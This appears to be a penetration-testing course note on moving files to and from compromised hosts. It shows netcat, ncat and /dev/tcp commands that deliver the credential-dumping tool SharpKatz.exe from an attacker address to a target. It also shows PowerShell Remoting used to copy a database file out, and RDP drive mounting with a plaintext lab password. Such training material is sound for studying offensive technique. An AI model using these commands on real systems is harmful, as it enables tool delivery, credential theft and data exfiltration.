Miscellaneous File Transfer Methods

File Transfer with Netcat and Ncat

NCat is the NMap updated and maintained verison of the original Netcat (not maintained anymore)

Target Machine

nc -l -p 8000 > SharpKatz.exe

If the compromised machine is using Ncat, we'll need to specify --recv-only to close the connection once the file transfer is finished.

ncat -l -p 8000 --recv-only > SharpKatz.exe

Attack machine

nc -q 0 192.168.49.128 8000 < SharpKatz.exe

By utilizing Ncat on our attacking host, we can opt for --send-only rather than -q. The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with --send-only, there is no need to anticipate further incoming information.

ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attack Host - Sending File as Input to Netcat

sudo nc -l -p 443 -q 0 < SharpKatz.exe

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Target - Connect to Netcat to Receive the File

nc 192.168.49.128 443 > SharpKatz.exe

ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Target - Connecting to Netcat Using /dev/tcp to Receive the File

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

PowerShell Session File Transfer

We already talk about doing file transfers with PowerShell, but there may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that's the case, we can use PowerShell Remoting, aka WinRM, to perform file transfer operations.

PowerShell Remoting allows us to execute scripts or commands on a remote computer using PowerShell sessions. Administrators commonly use PowerShell Remoting to manage remote computers in a network, and we can also use it for file transfer operations. By default, enabling PowerShell remoting creates both an HTTP and an HTTPS listener. The listeners run on default ports TCP/5985 for HTTP and TCP/5986 for HTTPS.

To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration.

From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.

Test-NetConnection -ComputerName DATABASE01 -Port 5985

Create a PowerShell Remoting Session to DATABASE01

$Session = New-PSSession -ComputerName DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session

Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

Copy DATABASE.txt from DATABASE01 Session to our Localhost

Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session

RDP

Mounting a Linux Folder Using rdesktop

rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

Mounting a Linux Folder Using xfreerdp

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Windows

Native mstsc.exe remote desktop client can be used

PreviousTransferring Files with Code NextProtected Files Transfer

Last updated 1 year ago

hashtagFile Transfer with Netcat and Ncat

hashtagTarget Machine

hashtagAttack machine

hashtagAttack Host - Sending File as Input to Netcat

hashtagTarget - Connect to Netcat to Receive the File

hashtagTarget - Connecting to Netcat Using /dev/tcp to Receive the File

hashtagPowerShell Session File Transfer

hashtagFrom DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.

hashtagCreate a PowerShell Remoting Session to DATABASE01

hashtagCopy samplefile.txt from our Localhost to the DATABASE01 Session

hashtagCopy DATABASE.txt from DATABASE01 Session to our Localhost

hashtagRDP

hashtagMounting a Linux Folder Using rdesktop

hashtagMounting a Linux Folder Using xfreerdp

hashtagWindows